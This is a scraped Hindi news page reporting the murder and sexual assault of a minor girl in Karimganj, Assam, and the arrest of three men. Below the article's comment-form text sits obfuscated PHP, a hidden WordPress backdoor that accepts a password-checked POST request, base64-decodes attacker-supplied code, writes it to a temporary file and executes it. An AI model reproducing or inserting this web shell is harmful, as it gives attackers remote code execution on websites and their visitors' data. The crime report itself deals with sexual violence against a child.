प्रेमी ने अपने दो दोस्तों के साथ मिलकर की प्रेमिका की हत्या, शव को बनाया हवस का शिकार, तीन गिरफ्तार

Uttarakhand Press 29 September 2023: असम से मानवता को शर्मसार करने वाली खबर सामने आई है। यहां के करीमगंज जिले में एक प्रेमी ने अपने दो दोस्तों के साथ मिलकर अपनी ही प्रेमिका की हत्या करके उसके शव के साथ दुष्कर्म किया। हालांकि, पुलिस ने हत्या करने और फिर शव के साथ यौन कृत्य करने के आरोप में रेलवे के एक कर्मचारी सहित तीन लोगों को गिरफ्तार किया है।

नौ सितंबर की घटना:
नाबालिग का शव नौ सितंबर को करीमगंज शहर के बाईपास के पास मिला था। बताया जा रहा है, उसी दिन उसकी हत्या की गई थी। करीमगंज के पुलिस अधीक्षक पार्थ प्रतिम दास ने बताया कि पोस्टमार्टम में नेक्रोफिलिया की पुष्टि हुई है। इसलिए यौन अपराधों से बच्चों का संरक्षण (पॉक्सो) अधिनियम के तहत मामला दर्ज कर लिया गया है।

डायरी से खुलासा:
एसपी ने बताया कि जांच के दौरान लड़की की निजी डायरी मिली थी, जिसमें एक फोन नंबर लिखा था। इस नंबर के माध्यम से तीनों आरोपियों के बारे में पता चला। बाद में उनके घरों से उन्हें पकड़ लिया गया।

यह है पूरा मामला:
अधिकारी ने बताया कि जांच में सामने आया है कि लड़की का हाल ही में भर्ती हुए रेलवे के एक कर्मचारी से प्रेम संबंध था। वह लगातार उस पर शारीरिक संबंध बनाने का दबाव डाल रहा था, लेकिन वह हर बार मना कर देती थी।

नौ सिंतबर को जब प्रेमी को पता चला कि लड़की घर में अकेली है, तो वह अपने दो दोस्तों के साथ वहां पहुंच गया और किशोरी के साथ दुष्कर्म करने की कोशिश की। जब उसने इसका विरोध किया, तो आरोपियों ने गला दबाकर उसकी हत्या कर दी और शव के साथ बारी-बारी से दुष्कर्म किया।

एसपी पार्थ ने बताया कि आरोपी ने शव को बाईपास के बगल में फेंक दिया था, जहां से बाद में उसे बरामद किया गया। बाद में लड़की के माता-पिता ने उसकी पहचान की।

Read Previous

दो हजार के नोट बदलने के लिए अब सिर्फ दो दिन बाकी, बैंकों में नहीं किए जमा…तो उठानी पड़ सकती है परेशानी

Read Next

बड़ा हादसा: लखनऊ में निर्माणाधीन अपार्टमेंट का एक हिस्सा ढहा, चपेट में आईं पांच झोपड़ियां, दो की मौत, 12 दबे

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}